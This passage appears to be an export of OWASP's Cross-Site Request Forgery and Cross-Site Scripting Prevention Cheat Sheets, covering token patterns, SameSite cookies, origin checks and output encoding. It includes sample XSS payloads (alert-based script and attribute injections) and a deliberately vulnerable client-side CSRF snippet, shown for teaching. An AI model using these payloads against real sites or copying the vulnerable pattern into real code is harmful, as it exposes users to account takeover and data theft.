The CSRF token can be transmitted to the client as part of a response payload, such as an HTML or JSON response. It can then be transmitted back to the server as a hidden field on a form submission, or via an AJAX request as a custom header value or part of a JSON payload. Make sure that the token is not leaked in the server logs, or in the URL. CSRF tokens in GET requests are potentially leaked at several locations, such as the browser history, log files, network utilities that log the first line of an HTTP request, and Referer headers if the protected site links to an external site.

For example:

<form action=\"/transfer.do\" method=\"post\">\n<input type=\"hidden\" name=\"CSRFToken\" value=\"OWY4NmQwODE4ODRjN2Q2NTlhMmZlYWEwYzU1YWQwMTVhM2JmNGYxYjJiMGI4MjJjZDE1ZDZMGYwMGEwOA==\">\n[...]\n</form>\n

Inserting the CSRF token in a custom HTTP request header via JavaScript is considered more secure than adding the token in the hidden field form parameter because requests with custom headers are automatically subject to the same-origin policy.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#double-submit-cookie","title":"Double Submit Cookie","text":"

If maintaining the state for CSRF token on the server is problematic, you can use an alternative technique known as the Double Submit Cookie pattern. This technique is easy to implement and is stateless. There are different ways to implement this technique, where the naive pattern is the most commonly used variation.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#naive-double-submit-cookie","title":"Naive Double Submit Cookie","text":"

The Naive Double Submit Cookie is a scalable and easy-to-implement technique where we send a random value both in a cookie and as a request parameter, with the server verifying whether the cookie value and request value match. When a user visits (even before authenticating, to prevent login CSRF), the site should generate an (ideally cryptographically strong) random value and set it as a cookie on the user's machine, separate from the session identifier. The site then requires that every transaction request includes this random value as a hidden form value or in a request header. If the two values match on the server side, the server accepts the request as legitimate; if they don't, it rejects the request.

In a nutshell, an attacker is unable to access the cookie value during a cross-site request. This prevents them from including a matching value in the hidden form value or as a request parameter/header.

The Naive Double Submit Cookie method is a good initial step to counter CSRF attacks, but it remains vulnerable to certain attacks. This resource provides more information on some vulnerabilities. It is therefore recommended to use a more secure implementation, the Signed Double Submit Cookie pattern.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#signed-double-submit-cookie","title":"Signed Double Submit Cookie","text":"

The Signed Double Submit Cookie involves a secret key known only to the server. This ensures that an attacker cannot create and inject their own, known, CSRF token into the victim's authenticated session. Tokens can be secured by hashing or encrypting them, with the HMAC algorithm being a popular choice due to its speed and ease of implementation.

In both cases, it is recommended to bind the CSRF token to the user's current session to further enhance security.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#hmac-csrf-token","title":"HMAC CSRF Token","text":"

A simpler alternative to an encrypted CSRF cookie is to use HMAC (Hash-based Message Authentication Code) to hash the random value with a secret key known only by the server and place this value in a cookie. This is similar to an encrypted cookie (both require knowledge only the server holds), but is less computationally intensive than encrypting and decrypting the cookie.

We recommend generating the HMAC CSRF Token, with a session-dependent user value, using the following steps:

Below is an example in pseudo-code that demonstrates the implementation steps described above:

// Gather the values\nsecret = readEnvironmentVariable(\"CSRF_SECRET\") // HMAC secret key\nsessionID = session.sessionID // Current authenticated user session\nrandomValue = cryptographic.randomValue() // Cryptographic random value\n\n// Create the CSRF Token\nmessage = sessionID + \"!\" + randomValue // HMAC message payload\nhmac = hmac(\"SHA256\", secret, message) // Generate the HMAC hash\ncsrfToken = hmac + \".\" + message // Combine HMAC hash with message to generate the token. The plain message is required to later authenticate it against its HMAC hash\n\n// Store the CSRF Token in a cookie\nresponse.setCookie(\"csrf_token=\" + csrfToken + \"; Secure\") // Set Cookie without HttpOnly flag\n
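
The pseudo-code above could be realised, for example, with Node's built-in crypto module; the following is a minimal sketch under that assumption (the environment variable name and verification helper are illustrative):

// Sketch: HMAC CSRF token generation and verification using Node's crypto module.\nconst crypto = require('crypto');\n\nfunction createCsrfToken(sessionID) {\nconst secret = process.env.CSRF_SECRET; // HMAC secret key known only to the server\nconst randomValue = crypto.randomBytes(32).toString('hex'); // cryptographic random value\nconst message = sessionID + '!' + randomValue; // HMAC message payload\nconst hmac = crypto.createHmac('sha256', secret).update(message).digest('hex');\nreturn hmac + '.' + message; // the plain message is kept so the HMAC can be re-computed on verification\n}\n\nfunction verifyCsrfToken(sessionID, token) {\nconst secret = process.env.CSRF_SECRET;\nconst separator = token.indexOf('.');\nif (separator < 0) { return false; }\nconst hmac = token.slice(0, separator);\nconst message = token.slice(separator + 1);\nconst expected = crypto.createHmac('sha256', secret).update(message).digest('hex');\n// The message must be bound to the current session and the HMAC must match\nreturn message.startsWith(sessionID + '!') && hmac.length === expected.length && crypto.timingSafeEqual(Buffer.from(hmac), Buffer.from(expected));\n}\n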

Should Timestamps be Included in CSRF Tokens for Expiration? It is a common misconception that timestamps should be included in CSRF tokens to enforce their expiration. A CSRF token is not an access token; it is used to verify the authenticity of requests throughout a session, using session information. A new session should generate a new token (1).

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-request-headers","title":"Custom Request Headers","text":"

Both the synchronizer token and the double submit cookie are used to prevent forgery of form data, but they can be tricky to implement and degrade usability. Many modern web applications do not use <form> tags. A user-friendly defense that is particularly well suited for AJAX or API endpoints is the use of a custom request header. No token is needed for this approach.

In this pattern, the client appends a custom header to requests that require CSRF protection. The header can be any arbitrary key-value pair, as long as it does not conflict with existing headers.

X-YOURSITE-CSRF-PROTECTION=1\n

When handling the request, the API checks for the existence of this header. If the header does not exist, the backend rejects the request as potential forgery. This approach has several advantages:

If you use <form> tags anywhere in your client, you will still need to protect them with alternate approaches described in this document such as tokens.

This defense relies on the browser's same-origin policy (SOP) restriction that only JavaScript can be used to add a custom header, and only within its origin. By default, browsers do not allow JavaScript to make cross origin requests with custom headers. Only JavaScript that you serve from your origin can add these headers.
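
A rough sketch of the pattern, reusing the header name from the example above (the endpoint and the Express-style server code are illustrative assumptions, not a prescribed API):

// Client side: only JavaScript served from your own origin can attach this custom header.\nfetch('/api/transfer', {\nmethod: 'POST',\nheaders: { 'X-YOURSITE-CSRF-PROTECTION': '1', 'Content-Type': 'application/json' },\nbody: JSON.stringify({ amount: 100 })\n});\n\n// Server side (Express-style sketch): reject state-changing requests that lack the header.\nfunction requireCsrfHeader(req, res, next) {\nif (!req.get('X-YOURSITE-CSRF-PROTECTION')) {\nreturn res.status(403).send('Rejected: potential request forgery');\n}\nnext();\n}\n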

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#custom-headers-and-cors","title":"Custom Headers and CORS","text":"

Cookies are not sent with cross-origin (CORS) requests by default. To enable cookies on an API, you must set Access-Control-Allow-Credentials=true. The browser will reject any response that includes Access-Control-Allow-Origin=* if credentials are allowed. To allow CORS requests, but protect against CSRF, you need to make sure the server only whitelists a few select origins that you definitively control via the Access-Control-Allow-Origin header. Any cross-origin request from an allowed domain will be able to set custom headers.

As an example, you might configure your backend to allow CORS with cookies from http://www.yoursite.com and http://mobile.yoursite.com, so that the only possible preflight responses are:

Access-Control-Allow-Origin=http://mobile.yoursite.com\nAccess-Control-Allow-Credentials=true\n

or

Access-Control-Allow-Origin=http://www.yoursite.com\nAccess-Control-Allow-Credentials=true\n

A less secure configuration would be to configure your backend server to allow CORS from all subdomains of your site using a regular expression. If an attacker is able to take over a subdomain (not uncommon with cloud services) your CORS configuration would allow them to bypass the same origin policy and forge a request with your custom header.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#defense-in-depth-techniques","title":"Defense In Depth Techniques","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#samesite-cookie-attribute","title":"SameSite Cookie Attribute","text":"

SameSite is a cookie attribute (similar to HTTPOnly, Secure etc.) which aims to mitigate CSRF attacks. It is defined in RFC6265bis. This attribute helps the browser decide whether to send cookies along with cross-site requests. Possible values for this attribute are Lax, Strict, or None.

The Strict value will prevent the cookie from being sent by the browser to the target site in all cross-site browsing context, even when following a regular link. For example, for a GitHub-like website this would mean that if a logged-in user follows a link to a private GitHub project posted on a corporate discussion forum or email, GitHub will not receive the session cookie and the user will not be able to access the project. A bank website however doesn't want to allow any transactional pages to be linked from external sites, so the Strict flag would be most appropriate.

The default Lax value provides a reasonable balance between security and usability for websites that want to maintain a user's logged-in session after the user arrives from an external link. In the above GitHub scenario, the session cookie would be allowed when following a regular link from an external website, while blocking it in CSRF-prone request methods such as POST. The only cross-site requests allowed in Lax mode are those that use safe HTTP methods and are top-level navigations.

For more details on the SameSite values, check the following section from the rfc.

Example of cookies using this attribute:

Set-Cookie: JSESSIONID=xxxxx; SameSite=Strict\nSet-Cookie: JSESSIONID=xxxxx; SameSite=Lax\n

All desktop browsers and almost all mobile browsers now support the SameSite attribute. To keep track of the browsers implementing it and the usage of the attribute, refer to the following service. Note that Chrome marks cookies as SameSite=Lax by default since Chrome 80 (February 2020), and Firefox and Edge are both planning to follow suit. Additionally, the Secure flag is required for cookies that are marked as SameSite=None.

It is important to note that this attribute should be implemented as an additional layer of a defense-in-depth approach. This attribute protects the user through the browsers supporting it, and there are two ways to bypass it, as mentioned in the following section. This attribute should not replace a CSRF token. Instead, it should co-exist with that token in order to protect the user in a more robust way.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#verifying-origin-with-standard-headers","title":"Verifying Origin With Standard Headers","text":"

There are two steps to this mitigation, both of which rely on examining an HTTP request header value.

  1. Determining the origin the request is coming from (source origin). Can be done via Origin or Referer headers.
  2. Determining the origin the request is going to (target origin).

On the server side, we verify whether the two origins match. If they do, we accept the request as legitimate (meaning it is a same-origin request), and if they don't, we discard the request (meaning that the request originated cross-domain). Reliance on these headers comes from the fact that they cannot be altered programmatically, as they fall under the forbidden headers list, meaning that only the browser can set them.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-source-origin-via-originreferer-header","title":"Identifying Source Origin (via Origin/Referer header)","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-origin-header","title":"Checking the Origin Header","text":"

If the Origin header is present, verify that its value matches the target origin. Unlike the Referer, the Origin header will be present in HTTP requests that originate from an HTTPS URL.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#checking-the-referer-header","title":"Checking the Referer Header","text":"

If the Origin header is not present, verify the hostname in the Referer header matches the target origin. This method of CSRF mitigation is also commonly used with unauthenticated requests, such as requests made prior to establishing a session state, which is required to keep track of a synchronization token.

In both cases, make sure the target origin check is strong. For example, if your site is example.org make sure example.org.attacker.com does not pass your origin check (i.e., match through the trailing / after the origin to make sure you are matching against the entire origin).
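
For illustration, a strict check could compare the full source origin against an explicit allow-list rather than using prefix or substring matching; the sketch below assumes an Express-style handler and a hypothetical allow-list:

// Sketch: verify the source origin against an exact allow-list (no prefix/substring matching).\nconst ALLOWED_ORIGINS = ['https://example.org', 'https://www.example.org']; // hypothetical allow-list\n\nfunction verifySourceOrigin(req) {\nconst origin = req.get('Origin');\nif (origin) {\nreturn ALLOWED_ORIGINS.includes(origin); // exact match: https://example.org.attacker.com will not pass\n}\nconst referer = req.get('Referer');\nif (referer) {\ntry {\nreturn ALLOWED_ORIGINS.includes(new URL(referer).origin); // compare only the origin part of the Referer\n} catch (e) {\nreturn false;\n}\n}\nreturn false; // neither header is present; blocking is the recommended default\n}\n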

If neither of these headers are present, you can either accept or block the request. We recommend blocking. Alternatively, you might want to log all such instances, monitor their use cases/behavior, and then start blocking requests only after you get enough confidence.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#identifying-the-target-origin","title":"Identifying the Target Origin","text":"

You might think it's easy to determine the target origin, but it's frequently not. The first thought is to simply grab the target origin (i.e., its hostname and port #) from the URL in the request. However, the application server is frequently sitting behind one or more proxies and the original URL is different from the URL the app server actually receives. If your application server is directly accessed by its users, then using the origin in the URL is fine and you're all set.

If you are behind a proxy, there are a number of options to consider.

This mitigation works properly when the Origin or Referer headers are present in requests. Although these headers are included the majority of the time, there are a few use cases where they are not included (most of them for legitimate reasons, such as safeguarding user privacy or accommodating browser behaviour). The following lists some use cases:

Usually, a small percentage of traffic (1-2%) does fall under the above categories, and no enterprise would want to lose this traffic. One popular technique used across the Internet to make this mitigation more usable is to accept the request if the Origin/Referer matches your configured list of domains "OR" a null value (examples here; the null value is to cover the edge cases mentioned above where these headers are not sent). Please note that attackers can exploit this, but people prefer to use this technique as a defense-in-depth measure because of the minor effort involved in deploying it.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#cookie-with-__host-prefix","title":"Cookie with __Host- prefix","text":"

Another solution for this problem is to use Cookie Prefixes for the cookie containing the CSRF token. If the cookie has the __Host- prefix, e.g. Set-Cookie: __Host-token=RANDOM; path=/; Secure, then the cookie:

As of July 2020 cookie prefixes are supported by all major browsers except Internet Explorer.

See the Mozilla Developer Network and IETF Draft for further information about cookie prefixes.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#user-interaction-based-csrf-defense","title":"User Interaction Based CSRF Defense","text":"

While none of the techniques referenced here require any user interaction, sometimes it's easier or more appropriate to involve the user in the transaction to prevent unauthorized operations (forged via CSRF or otherwise). The following are some examples of techniques that can act as strong CSRF defenses when implemented correctly.

While these are very strong CSRF defenses, they can create a significant impact on the user experience. As such, they would generally only be used for security critical operations (such as password changes, money transfers, etc.), alongside the other defences discussed in this cheat sheet.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#login-csrf","title":"Login CSRF","text":"

Most developers tend to ignore CSRF vulnerabilities on login forms, assuming that CSRF is not applicable there because the user is not authenticated at that stage; however, this assumption is not always true. CSRF vulnerabilities can still occur on login forms where the user is not authenticated, but the impact and risk are different.

For example, if an attacker uses CSRF to authenticate a victim on a shopping website using the attacker's account, and the victim then enters their credit card information, the attacker may be able to purchase items using the victim's stored card details. For more information about login CSRF and other risks, see section 3 of this paper.

Login CSRF can be mitigated by creating pre-sessions (sessions before a user is authenticated) and including tokens in the login form. You can use any of the techniques mentioned above to generate tokens. Remember that pre-sessions cannot be transitioned to real sessions once the user is authenticated - the session should be destroyed and a new one should be made to avoid session fixation attacks. This technique is described in Robust Defenses for Cross-Site Request Forgery, section 4.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf","title":"Client-side CSRF","text":"

Client-side CSRF is a new variant of CSRF attacks where the attacker tricks the client-side JavaScript code to send a forged HTTP request to a vulnerable target site by manipulating the program\u2019s input parameters. Client-side CSRF originates when the JavaScript program uses attacker-controlled inputs, such as the URL, for the generation of asynchronous HTTP requests.

Note: These variants of CSRF are particularly important as they can bypass some of the common anti-CSRF countermeasures like token-based mitigations and SameSite cookies. For example, when synchronizer tokens or custom HTTP request headers are used, the JavaScript program will include them in the asynchronous requests. Also, web browsers will include cookies in same-site request contexts initiated by JavaScript programs, circumventing the SameSite cookie policies.

Client-side vs. Classical CSRF: In classical CSRF, the vulnerable component is the server-side program, which cannot distinguish whether the incoming authenticated request was performed intentionally, also known as the confused deputy problem. In client-side CSRF, the vulnerable component is the client-side JavaScript program instead, which allows an attacker to generate arbitrary asynchronous requests, e.g., by manipulating the request endpoint and/or its parameters. Client-side CSRF is an input validation problem that, when exploited, reintroduces the confused deputy flaw: the server side will, once again, be unable to distinguish whether the request was performed intentionally or not.

For more information about client-side CSRF vulnerabilities, see Sections 2 and 5 of this paper, the CSRF chapter of the SameSite wiki, and this post by the Facebook Whitehat program.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-example","title":"Client-side CSRF Example","text":"

The following code snippet demonstrates a simple example of a client-side CSRF vulnerability.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction ajaxLoad(){\n// process the URL hash fragment\nlet hash_fragment = window.location.hash.slice(1);  // hash fragment should be of the format: /^(get|post);(.*)$/\n// e.g., https://site.com/index/#post;/profile\nif(hash_fragment.length > 0 && hash_fragment.indexOf(';') > 0 ){\n\nlet params = hash_fragment.match(/^(get|post);(.*)$/);\nif(params && params.length){\nlet request_method = params[1];   let request_endpoint = params[3];\n\nfetch(request_endpoint, {\nmethod: request_method,\nheaders: {\n'XSRF-TOKEN': csrf_token,\n// [...]\n},\n// [...]\n}).then(response => { /* [...] */ }); }\n}\n}\n// trigger the async request on page load\nwindow.onload = ajaxLoad();\n</script>\n

Vulnerability: In this snippet, the program invokes a function ajaxLoad() upon the page load, which is responsible for loading various webpage elements. The function reads the value of the URL hash fragment (line 4), and extracts two pieces of information from it (i.e., request method and endpoint) to generate an asynchronous HTTP request (lines 11-13). The vulnerability occurs in lines 15-22, when the JavaScript program uses URL fragments to obtain the server-side endpoint for the asynchronous HTTP request (line 15) and the request method. However, both inputs can be controlled by web attackers, who can pick the value of their choosing, and craft a malicious URL containing the attack payload.

Attack: For exploitation, attackers can share the malicious URL with the victim (e.g., via spear-phishing emails) and convince them to click on it, because such a URL belongs to the origin of an honest, reputable but vulnerable website. Alternatively, they can use it as a part of an attack page they control and abuse browser APIs (e.g., the window.open() API) to trick the vulnerable JavaScript of the target page into sending the HTTP request, which closely resembles the attack model of the classical CSRF attacks.

For more examples of client-side CSRF, see this post by the Facebook Whitehat program and this USENIX Security paper.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#client-side-csrf-mitigation-techniques","title":"Client-side CSRF Mitigation Techniques","text":"

Independent Requests: Client-side CSRF can be prevented if asynchronous requests are not generated via attacker controllable inputs, such as the URL, window name, document referrer, and postMessages, to name only a few examples.

Input Validation: Achieving complete isolation between inputs and request parameters may not always be possible, depending on the context and functionality. In these cases, input validation checks have to be implemented. These checks should strictly assess the format and choice of the values of the request parameters, and decide whether they can only be used in non-state-changing operations (e.g., only allow GET requests and endpoints starting with a predefined prefix).

Predefined Request Data: Another mitigation technique is to store a list of predefined, safe request data in the JavaScript code (e.g., combinations of endpoints, request methods and other parameters that are safe to be replayed). The program can then use a switch parameter in the URL fragment to decide which entry of the list each JavaScript function should use, as sketched below.
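
A minimal sketch of this idea (the switch keys and endpoints are illustrative only) shows how the URL fragment selects an entry from an allow-list instead of being used to build the request directly:

// Sketch: only replay requests from a predefined allow-list, selected by a switch key in the URL fragment.\nconst SAFE_REQUESTS = {\nprofile: { method: 'GET', endpoint: '/profile' },\ninbox: { method: 'GET', endpoint: '/messages' }\n}; // illustrative entries; only non-state-changing requests are listed\n\nfunction ajaxLoad() {\nconst key = window.location.hash.slice(1); // e.g., https://site.com/index#profile\nconst entry = SAFE_REQUESTS[key];\nif (!entry) { return; } // unknown keys are ignored instead of being turned into requests\nfetch(entry.endpoint, { method: entry.method }).then(response => { /* [...] */ });\n}\nwindow.onload = ajaxLoad;\n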

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#java-reference-example","title":"Java Reference Example","text":"

The following JEE web filter provides an example reference for some of the concepts described in this cheatsheet. It implements the following stateless mitigations (OWASP CSRFGuard covers a stateful approach).

Please note that it only acts as a reference sample and is not complete (for example, it doesn't have a block to direct the control flow when the origin and referrer header check succeeds, nor does it have port/host/protocol level validation for the referrer header). Developers are recommended to build their complete mitigation on top of this reference sample. Developers should also implement authentication and authorization mechanisms before the CSRF check can be considered effective.

Full source is located here and provides a runnable POC.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#javascript-guidance-for-auto-inclusion-of-csrf-tokens-as-an-ajax-request-header","title":"JavaScript Guidance for Auto-inclusion of CSRF tokens as an AJAX Request header","text":"

The following guidance considers the GET, HEAD, and OPTIONS methods to be safe operations. Therefore, GET, HEAD, and OPTIONS method AJAX calls need not be appended with a CSRF token header. However, if these verbs are used to perform state-changing operations, they will also require a CSRF token header (although this is bad practice, and should be avoided).

The POST, PUT, PATCH, and DELETE methods, being state changing verbs, should have a CSRF token attached to the request. The following guidance will demonstrate how to create overrides in JavaScript libraries to have CSRF tokens included automatically with every AJAX request for the state changing methods mentioned above.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#storing-the-csrf-token-value-in-the-dom","title":"Storing the CSRF Token Value in the DOM","text":"

A CSRF token can be included in the <meta> tag as shown below. All subsequent calls in the page can extract the CSRF token from this <meta> tag. It can also be stored in a JavaScript variable or anywhere on the DOM. However, it is not recommended to store it in cookies or browser local storage.

The following code snippet can be used to include a CSRF token as a <meta> tag:

<meta name=\"csrf-token\" content=\"{{ csrf_token() }}\">\n

The exact syntax of populating the content attribute would depend on your web application's backend programming language.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#overriding-defaults-to-set-custom-header","title":"Overriding Defaults to Set Custom Header","text":"

Several JavaScript libraries allow for overriding default settings to have a header added automatically to all AJAX requests.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#xmlhttprequest-native-javascript","title":"XMLHttpRequest (Native JavaScript)","text":"

XMLHttpRequest's open() method can be overridden to set the anti-csrf-token header whenever the open() method is invoked next. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

This can be done as demonstrated in the following code snippet:

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\nvar o = XMLHttpRequest.prototype.open;\nXMLHttpRequest.prototype.open = function(){\nvar res = o.apply(this, arguments);\nvar err = new Error();\nif (!csrfSafeMethod(arguments[0])) {\nthis.setRequestHeader('anti-csrf-token', csrf_token);\n}\nreturn res;\n};\n</script>\n
"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#angularjs","title":"AngularJS","text":"

AngularJS allows for setting default headers for HTTP operations. Further documentation can be found at AngularJS's documentation for $httpProvider.

<script>\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\nvar app = angular.module(\"app\", []);\n\napp.config(['$httpProvider', function ($httpProvider) {\n$httpProvider.defaults.headers.post[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.put[\"anti-csrf-token\"] = csrf_token;\n$httpProvider.defaults.headers.patch[\"anti-csrf-token\"] = csrf_token;\n// AngularJS does not create an object for DELETE and TRACE methods by default, and has to be manually created.\n$httpProvider.defaults.headers.delete = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n$httpProvider.defaults.headers.trace = {\n\"Content-Type\" : \"application/json;charset=utf-8\",\n\"anti-csrf-token\" : csrf_token\n};\n}]);\n</script>\n

This code snippet has been tested with AngularJS version 1.7.7.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#axios","title":"Axios","text":"

Axios allows us to set default headers for the POST, PUT, DELETE and PATCH actions.

<script type=\"text/javascript\">\nvar csrf_token = document.querySelector(\"meta[name='csrf-token']\").getAttribute(\"content\");\n\naxios.defaults.headers.post['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.put['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.delete['anti-csrf-token'] = csrf_token;\naxios.defaults.headers.patch['anti-csrf-token'] = csrf_token;\n\n// Axios does not create an object for TRACE method by default, and has to be created manually.\naxios.defaults.headers.trace = {}\naxios.defaults.headers.trace['anti-csrf-token'] = csrf_token\n</script>\n

This code snippet has been tested with Axios version 0.18.0.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#jquery","title":"JQuery","text":"

jQuery exposes an API called $.ajaxSetup(), which can be used to add the anti-csrf-token header to the AJAX request. API documentation for $.ajaxSetup() can be found here. The function csrfSafeMethod() defined below will filter out the safe HTTP methods and only add the header to unsafe HTTP methods.

You can configure jQuery to automatically add the token to all request headers by adopting the following code snippet. This provides a simple and convenient CSRF protection for your AJAX based applications:

<script type=\"text/javascript\">\nvar csrf_token = $('meta[name=\"csrf-token\"]').attr('content');\n\nfunction csrfSafeMethod(method) {\n// these HTTP methods do not require CSRF protection\nreturn (/^(GET|HEAD|OPTIONS)$/.test(method));\n}\n\n$.ajaxSetup({\nbeforeSend: function(xhr, settings) {\nif (!csrfSafeMethod(settings.type) && !this.crossDomain) {\nxhr.setRequestHeader(\"anti-csrf-token\", csrf_token);\n}\n}\n});\n</script>\n

This code snippet has been tested with jQuery version 3.3.1.

"},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Cross-Site_Request_Forgery_Prevention_Cheat_Sheet.html#csrf","title":"CSRF","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html","title":"Cross Site Scripting Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This cheat sheet provides guidance to prevent XSS vulnerabilities.

Cross-Site Scripting (XSS) is a misnomer. The name originated from early versions of the attack where stealing data cross-site was the primary focus. Since then, it has extended to include injection of basically any content, but we still refer to this as XSS. XSS is serious and can lead to account impersonation, observing user behaviour, loading external content, stealing sensitive data, and more.

This cheatsheet is a list of techniques to prevent or limit the impact of XSS. No single technique will solve XSS. Using the right combination of defensive techniques is necessary to prevent XSS.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#framework-security","title":"Framework Security","text":"

Fewer XSS bugs appear in applications built with modern web frameworks. These frameworks steer developers towards good security practices and help mitigate XSS by using templating, auto-escaping, and more. That said, developers need to be aware of problems that can occur when using frameworks insecurely such as:

Understand how your framework prevents XSS and where it has gaps. There will be times where you need to do something outside the protection provided by your framework. This is where Output Encoding and HTML Sanitization are critical. OWASP are producing framework specific cheatsheets for React, Vue, and Angular.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#xss-defense-philosophy","title":"XSS Defense Philosophy","text":"

For XSS attacks to be successful, an attacker needs to insert and execute malicious content in a webpage. Each variable in a web application needs to be protected. Ensuring that all variables go through validation and are then escaped or sanitized is known as perfect injection resistance. Any variable that does not go through this process is a potential weakness. Frameworks make it easy to ensure variables are correctly validated and escaped or sanitised.

However, frameworks aren't perfect and security gaps still exist in popular frameworks like React and Angular. Output Encoding and HTML Sanitization help address those gaps.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding","title":"Output Encoding","text":"

Output Encoding is recommended when you need to safely display data exactly as a user typed it in. Variables should not be interpreted as code instead of text. This section covers each form of output encoding, where to use it, and where to avoid using dynamic variables entirely.

Start with using your framework\u2019s default output encoding protection when you wish to display data as the user typed it in. Automatic encoding and escaping functions are built into most frameworks.

If you\u2019re not using a framework or need to cover gaps in the framework then you should use an output encoding library. Each variable used in the user interface should be passed through an output encoding function. A list of output encoding libraries is included in the appendix.

There are many different output encoding methods because browsers parse HTML, JS, URLs, and CSS differently. Using the wrong encoding method may introduce weaknesses or harm the functionality of your application.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-contexts","title":"Output Encoding for \u201cHTML Contexts\u201d","text":"

\u201cHTML Context\u201d refers to inserting a variable between two basic HTML tags like a <div> or <b>. For example:

<div> $varUnsafe </div>\n

An attacker could modify data that is rendered as $varUnsafe. This could lead to an attack being added to a webpage; for example:

<div> <script>alert`1`</script> </div> // Example Attack\n

In order to add a variable to a HTML context safely, use HTML entity encoding for that variable as you add it to a web template.

Here are some examples of encoded values for specific characters.

If you're using JavaScript for writing to HTML, look at the .textContent attribute as it is a Safe Sink and will automatically HTML Entity Encode.

&    &amp;\n<    &lt;\n>    &gt;\n\"    &quot;\n'    &#x27;\n
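
If no encoding library is available, a minimal HTML entity encoder covering the characters above could look like the following sketch (a maintained encoding library is still preferable):

// Sketch: minimal HTML entity encoding for the characters listed above.\nfunction htmlEntityEncode(value) {\nreturn String(value)\n.replace(/&/g, '&amp;')\n.replace(/</g, '&lt;')\n.replace(/>/g, '&gt;')\n.replace(/\"/g, '&quot;')\n.replace(/'/g, '&#x27;');\n}\n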
"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-html-attribute-contexts","title":"Output Encoding for \u201cHTML Attribute Contexts\u201d","text":"

\u201cHTML Attribute Contexts\u201d refer to placing a variable in an HTML attribute value. You may want to do this to change a hyperlink, hide an element, add alt-text for an image, or change inline CSS styles. You should apply HTML attribute encoding to variables being placed in most HTML attributes. A list of safe HTML attributes is provided in the Safe Sinks section.

<div attr=\"$varUnsafe\">\n<div attr=\u201d*x\u201d onblur=\u201dalert(1)*\u201d> // Example Attack\n

It\u2019s critical to use quotation marks like \" or ' to surround your variables. Quoting makes it difficult to change the context a variable operates in, which helps prevent XSS. Quoting also significantly reduces the character set that you need to encode, making your application more reliable and the encoding easier to implement.

If you're using JavaScript for writing to a HTML Attribute, look at the .setAttribute and [attribute] methods which will automatically HTML Attribute Encode. Those are Safe Sinks as long as the attribute name is hardcoded and innocuous, like id or class. Generally, attributes that accept JavaScript, such as onClick, are NOT safe to use with untrusted attribute values.

"},{"location":"cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html#output-encoding-for-javascript-contexts","title":"Output Encoding for \u201cJavaScript Contexts\u201d","text":"

